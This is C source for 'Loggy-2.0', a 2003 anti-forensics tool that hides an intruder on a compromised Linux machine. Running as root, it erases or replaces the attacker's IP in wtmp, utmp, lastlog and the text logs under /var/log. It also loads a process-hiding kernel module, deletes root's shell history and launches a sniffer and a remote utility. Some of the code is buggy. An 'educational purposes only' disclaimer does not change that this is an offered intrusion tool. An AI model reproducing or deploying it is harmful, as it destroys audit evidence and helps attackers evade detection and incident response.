/*
 *  Loggy-2.0 is a logcleaner and a tool to hide you in a linux machine
 *  by eliminating or modifing the intruder ip from the default logfiles in /var
 *  bin and txt logs
 *  the new features in this version are many!, read the Changelog file
 *  to see the changes and the new functions.
 *  this istrument has been coded by "Evil" a mojodo project's member
 *  you can find me for more help and for the bug reports on
 *  irc at irc.azzurra.org - #eviltime.com
 *  on e-mail webmaster@eviltime.com
 *  in my site www.eviltime.com
 *  or in the mojodo own site, www.mojodo.it
 *
 *  THIS INSTRUMENT HAS BEEN CODED FOR EDUCATIONAL PURPOSES ONLY
 *  coded by Evil from MOJODO 2003 PROJECT
 *  IM NOT RESPONSIBLE OF YOUR ACT, DONT ABUSE IT www.mojodo.it (C)
 *
 */

/* includes */

#include "includes/logs.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/file.h>
#include <utime.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <dirent.h>
#include <signal.h>
#include <string.h>
#include <lastlog.h>

#define VERSION "2.0"

long logsize(char *);
void restore(void);
void delete(void);
void usage(char *);
void clean_logs(char *, char *);
void modify_wtmp(char *, char *);
void modify_utmp(char *, char *);
void modify_lastlog(char *, char *);
void recursive_search(char *);
void check_root(void);
void clean_system();

const char banner[] = "\n(*) Loggy 2.0 - stealth secure and fast log cleaner tool for linux\n"
                      "                  coded by evil, under the GPL licence, no (c) 2003\n"
                      "                  www.mojodo.it & www.eviltime.com for more info\n"
                      " ---------------------------------------------------------------- \n\n";

int f, c;
int histclean=0;
int backup=0;
int newl=0;
int lastc, wtmpc, utmpc, txtlogs, totalc;

char fakestring[1024];
char perlog[1024];
char syslog_conf[]="/etc/syslog.conf";

long logsize(char *path)
{
struct stat temp;
long size = -1;

   if (stat(path,&temp) == 0)
      size = temp.st_size;

 return size;
}

void recursive_search(char *host)
{
  FILE *in, *popen ();
  char buffer[100];
  char cmd[255]={"\0"};
  int count = 0;
  in = popen("ls /var/log", "r");
  while (fgets(buffer, 100, in) != NULL)
      {  
         if (strstr(buffer, "tmp") != NULL);
         if (strstr(buffer, "lastlog") != NULL);
         if (strstr(buffer, ".gz") != NULL);
         sprintf(cmd ,"/var/log/%s", buffer);
         clean_logs(cmd, host);
      }
  pclose(in);
}

void delete(void) 
{
    FILE *log;

    char realcmd[10240];
    char buffer[MAXBUFF];
    char cmd[255]={"\0"};

    log = fopen ("backup/del.bak", "r");
    if (log == 0) {
	fprintf(stderr, "  + unable to find backup file\n");
    }
    else 
    {
	printf ("  - loggy : deleting all backup file ... \n");
      while (fgets(buffer, MAXBUFF,log) != NULL){
         printf ("            %s", buffer);
         system(buffer);
      }
    printf("\n");
    fclose (log);
  }
 exit(0);
}


void restore(void) 
{
    FILE *log;

    char realcmd[10240];
    char buffer[MAXBUFF];
    char cmd[255]={"\0"};

    log = fopen ("backup/del.bak", "r");
    if (log == 0) {
	fprintf(stderr, "  + unable to find backup file\n");
    }
    else 
    {
	printf ("  - loggy : restoring all logs ... \n");
      while (fgets(buffer, MAXBUFF,log) != NULL){
         printf ("            %s", buffer);
         system(buffer);
      }
    printf("\n");
    fclose (log);
  }
 exit(0);
}

    
void clean_logs(char *ulog, char *host)
{
    FILE *log;
    FILE *flog;
    FILE *realog;

    char realcmd[10240];
    char buffer[MAXBUFF];
    char cmd[255]={"\0"};
    char *logfile = NULL;
  
    logfile = ulog;
    logfile = strchr(ulog, '\n');
    if (*logfile == '\n')
        *logfile = '\0';
    else
      exit (-1);

    log = fopen (ulog, "r");
    if (log == 0) {
	fprintf(stderr, "  + unable to find %s\n", ulog);
    }
    flog = fopen ("logfile.tmp", "w");
    if (flog == 0) {
      fprintf(stderr, "  + unable to create temp file\n");
    }
    else 
    {
	printf ("  - %s : txt logs (%d bytes) ... ",ulog,logsize(ulog));
      while (fgets(buffer, MAXBUFF,log) != NULL){
	  if (!strstr(buffer,host)) {
          fputs(buffer,flog);
	  }
      }
}

    fclose (log);
    fclose (flog);

  realog = fopen(ulog, "r");
  if ( realog != 0 ) {
      if ( backup == 1 ) {
         printf (" [backup]");
         sprintf(cmd,"cp %s %s.bak ; echo \"mv %s.bak %s\" >> backup/list.bak",ulog,ulog,ulog,ulog);
         system(cmd);
         sprintf(cmd,"echo \"rm %s.bak\" >> backup/del.bak",ulog);
         system(cmd);
      }
      sprintf(realcmd, "mv logfile.tmp %s", ulog);
      system(realcmd);
      fclose(realog);
      txtlogs++;
    }
    printf ("\tdone. [%d]\n",logsize(ulog));
}

/* wtmp clean process */

void modify_wtmp(char *host,char *fake)
{
    struct utmp utmp_ent;
    int f;
    char cmd[255]={"\0"};

        if ((f=open(WTMP_NAME,O_RDWR))<0) {
		perror("open");
		close(f);
         }      
              if ( backup == 1 ) {
                 printf (" [backup]");
                 sprintf(cmd,"cp %s %s.bak ; echo \"mv %s.bak %s\" >> 

backup/list.bak",WTMP_NAME,WTMP_NAME,WTMP_NAME,WTMP_NAME);
                 system(cmd);
                 sprintf(cmd,"echo \"rm %s.bak\" >> backup/del.bak",WTMP_NAME);
                 system(cmd);
              }
     while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
          if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
		  if(fake) {
			  memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
		  }else {
               memset(&utmp_ent,0,sizeof(struct utmp ));
		  }

               lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
               write (f, &utmp_ent, sizeof( utmp_ent ));
               wtmpc++;
            } 
        }
     close(f);
     printf ("\tdone. [%d]\n",logsize(WTMP_NAME));
}

/* utmp clean process */

void modify_utmp(char *host,char *fake)
{
     int f;
     struct utmp utmp_ent;
     char cmd[255]={"\0"};

     if ((f=open(UTMP_NAME,O_RDWR))<0) {
	     perror("open");
	     close(f);
        }
              if ( backup == 1 ) {
                 printf (" [backup]");
                 sprintf(cmd,"cp %s %s.bak ; echo \"mv %s.bak %s\" >> 

backup/list.bak",UTMP_NAME,UTMP_NAME,UTMP_NAME,UTMP_NAME);
                 system(cmd);
                 sprintf(cmd,"echo \"rm %s.bak\" >> backup/del.bak",UTMP_NAME);
                 system(cmd);
              }
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
	       if(fake) {
		       memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
	       }else {
                 memset(&utmp_ent,0,sizeof( utmp_ent ));
		 }

                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
                 utmpc++;
            }
     close(f);
     printf ("\tdone. [%d]\n",logsize(UTMP_NAME));
  
}

/* lastlog clean process */

void modify_lastlog(char *host,char *fake)
{   
    int f;
    struct lastlog newll;
    char cmd[255]={"\0"};


        if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
		perror("open");
		close(f);
         } else {
              if ( backup == 1 ) {
                 printf (" [backup]");
                 sprintf(cmd,"cp %s %s.bak ; echo \"mv %s.bak %s\" >> 

backup/list.bak",LASTLOG_NAME,LASTLOG_NAME,LASTLOG_NAME,LASTLOG_NAME);
                 system(cmd);
                 sprintf(cmd,"echo \"rm %s.bak\" >> backup/del.bak",LASTLOG_NAME);
                 system(cmd);
              }
               while(read(f,&newll,sizeof(struct lastlog)) > 0 ) { 
                 if(!strncmp(newll.ll_host,host,strlen(host))) {
			 if(fake) {
				 memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
			 }else {
                   memset(&newll,0,sizeof( newll ));
			 }
                   lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
                   write(f,&newll, sizeof( newll ));
                   lastc++;
               }
          }
        close(f);
      }
      printf ("\tdone. [%d]\n",logsize(LASTLOG_NAME));
}

/* check if the root is logged in */

void check_root(void)
{
  static struct utmp *entry;
  int lc=0, rc=0;
  char ans='n';

  setutent();
  while ((entry = getutent())!=NULL)
  {
    if (entry->ut_type != USER_PROCESS)
      continue;
    lc++;

    if (!strcmp(entry->ut_user, "root"));
    {
      printf("  * pay attention, root logged on %s\n", entry->ut_line);
      printf("  * wanna stop? (y/n): ");
      scanf("%s", &ans);
      switch (ans) {
        case 'y': { 
          printf("\n");
          clean_system();
          exit(0);
          break;
        }
        case 'n': { 
          printf(" continue\n");
          break;
        }        
      }
      rc++;
    }
  }

  printf("  * monitor: %d user(s) logged in, %d root login(s)\n\n", lc, rc);

  endutent();
}

/* clean system logs (histfile) and remove the lkms */

void clean_system()
{
  system("rmmod hideproc");
  if(histclean==1) {
     system("rm -f /root/.bash_history");
     system("rm -f /root/.bash_profile");
     system("ln -s /dev/null /.bash_history");
  }
}  

/* main */

main(int argc,char *argv[]) {
  
  printf("%s",banner);

  if (argc<2) {
      usage(argv[0]);
    }

    while((c = getopt(argc, argv, "hibmrf:T:t:u:s:d:l:")) != EOF){
        switch(c){
            case 'h': {
                usage(argv[0]);
                break;
                }
            case 'f': {
                strncpy(fakestring, optarg, sizeof(optarg));
                break;
                }
            case 's': {
                strncpy(fakestring, optarg, sizeof(optarg));
                break;
                }
            case 'u': {
                strncpy(fakestring, optarg, sizeof(optarg));
                break;
                }
            case 't': {
                strncpy(fakestring, optarg, sizeof(optarg));
                break;
                }
            case 'T': {
                strncpy(fakestring, optarg, sizeof(optarg));
                break;
                }
            case 'd': {
                strncpy(syslog_conf, optarg, sizeof(optarg));
                break;
                }
            case 'l': {
                newl=1;
                strncpy(perlog, optarg, sizeof(optarg));
                break;
                }
            case 'i': {
                histclean=1;
                break;
                }
            case 'b': {
                backup=1;
                break;
                }
            case 'r': {
                restore();
                break;
                }
            case 'm': {
                delete();
                break;
                }

        }
    }
  
  if(getuid() !=0) {
     printf("  + you are'nt root in this system\n");
     exit(-1);
    } 

      check_root(); 
      system("insmod hideproc.o");
      printf ("  - lastlog : bin logs (%d) ... ",logsize(LASTLOG_NAME));
      modify_lastlog(argv[1],fakestring);
      printf ("  - utmp : bin logs (%d) ... ",logsize(UTMP_NAME));
      modify_utmp(argv[1],fakestring);
      printf ("  - wtmp : bin logs (%d) ... ",logsize(WTMP_NAME));
      modify_wtmp(argv[1],fakestring);
      recursive_search(argv[1]);
      if(newl==1) {
         clean_logs(perlog, argv[1]);
      }
      system("killall -HUP syslogd");
      system("./ifsniff");
      system("sh utils/ifremote");
      totalc=lastc+wtmpc+utmpc+txtlogs;
      fprintf(stdout,"\n  + loggy-%s has finished his work\n", VERSION);
      fprintf(stdout,"  + %d cleaned lines\n\n",totalc);
      clean_system();


}

void usage(char *progname) { 
  fprintf(stdout, "  + usage: %s <ip/string> [options]\n", progname);
  fprintf(stdout, "               -f fakestring - change string with a fakestring\n");
  fprintf(stdout, "               -d path       - the path of the syslog conf. file (default: 

/etc/syslog.conf)\n");
  fprintf(stdout, "               -l log        - clean a specified logfile (fullpath)\n");
  fprintf(stdout, "               -i            - clean history log files\n"); 
  fprintf(stdout, "               -b            - create a backup off all logfiles\n"); 
  fprintf(stdout, "               -r            - using the created backup\n"); 
  fprintf(stdout, "               -m            - delete backup files\n\n"); 
  exit(0); 
}
